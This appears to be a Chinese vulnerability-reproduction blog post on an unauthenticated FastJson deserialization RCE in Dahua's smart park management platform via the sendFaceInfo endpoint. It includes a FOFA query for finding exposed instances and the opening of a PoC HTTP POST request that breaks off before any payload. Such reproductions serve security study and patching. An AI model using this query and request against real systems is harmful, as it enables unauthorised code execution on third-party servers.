大华智慧园区综合管理平台 sendFaceInfo RCE漏洞复现

0x01 产品简介

 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

0x02 漏洞概述

 由于大华智慧园区综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用/CardSolution/card/face/sendFaceInfo接口发送恶意的序列化数据执行任意指令,造成代码执行。

0x03 复现环境

FOFA:app="dahua-智慧园区综合管理平台"

大华智慧园区综合管理平台 sendFaceInfo RCE漏洞复现_第1张图片

0x04 漏洞复现 

PoC

POST /CardSolution/card/face/sendFaceInfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Saf

你可能感兴趣的:(漏洞复现,安全,web安全)